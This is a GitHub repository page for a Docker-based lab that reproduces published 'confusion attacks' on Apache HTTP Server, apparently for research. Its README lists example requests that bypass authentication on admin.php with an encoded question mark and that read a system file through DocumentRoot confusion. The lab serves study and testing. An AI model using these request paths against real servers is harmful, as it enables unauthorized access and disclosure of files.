Skip to content

harisec/orange-confusion-attacks

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
config
config
 
 
scripts
scripts
 
 
src
src
 
 
.htaccess
.htaccess
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
build.bat
build.bat
 
 
cooly.php
cooly.php
 
 
run.bat
run.bat
 
 

Repository files navigation

orange-confusion-attacks

Repro for Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Discovered by https://x.com/orange_8361

https://blog.orange.tw/posts/2024-08-confusion-attacks-en/

To build and run:

docker build -t my-php-website .
docker run -p 80:80 my-php-website

To repro the issues

Filename Confusion

http://127.0.0.1/admin.php => 401
http://127.0.0.1/admin.php%3ftest.php => 200

DocumentRoot Confusion

http://127.0.0.1/html/usr/share/doc/hostname/copyright%3f

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

19 stars

Watchers

1 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages